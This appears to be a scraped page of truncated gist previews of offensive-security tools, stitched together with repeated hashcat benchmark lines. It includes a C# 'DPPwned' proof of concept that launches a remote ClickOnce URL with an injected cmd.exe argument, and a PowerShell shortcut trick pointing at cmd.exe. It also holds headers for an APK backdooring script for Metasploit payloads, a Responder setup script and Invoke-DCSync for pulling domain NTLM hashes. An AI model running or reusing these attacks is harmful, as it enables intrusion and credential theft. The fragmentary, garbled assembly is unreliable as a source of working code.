Product: Sagitta Brutalis 1080 (PN S3480-GTX-1080-2697-128)
Software: Hashcat v3.00-beta-145-g069634a, Nvidia driver 367.18
Accelerator: 8x Nvidia GTX 1080 Founders Edition
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="AtomicRedTeam" | |
progid="AtomicRedTeam" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> |
$file = Get-Content "c:\test\test.txt" | |
$WshShell = New-Object -comObject WScript.Shell | |
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk") | |
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" | |
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" | |
$Shortcut.Arguments = ' '+ $file | |
$Shortcut.Save() |
using System; | |
using System.Runtime.InteropServices; | |
class DPPwned { | |
[DllImport("dfshim.dll")] | |
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags); | |
public static void Main() { | |
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0); |
Product: Sagitta Brutalis 1080 (PN S3480-GTX-1080-2697-128)
Software: Hashcat v3.00-beta-145-g069634a, Nvidia driver 367.18
Accelerator: 8x Nvidia GTX 1080 Founders Edition
function ConvertTo-CIPolicy { | |
<# | |
.SYNOPSIS | |
Converts a binary file that contains a Code Integrity policy into XML format. | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
.DESCRIPTION |
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
#!/usr/bin/env ruby | |
# apk_backdoor.rb | |
# This script is a POC for injecting metasploit payloads on | |
# arbitrary APKs. | |
# Authored by timwr, Jack64 | |
# | |
require 'nokogiri' | |
require 'fileutils' |
#!/bin/bash | |
# | |
# TODO: Add checks for packages | |
# | |
# apt-get install -y python git python-pip python-dev screen sqlite3 | |
# pip install pycrypto | |
# cd /root | |
# git clone https://github.com/spiderlabs/responder | |
# |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |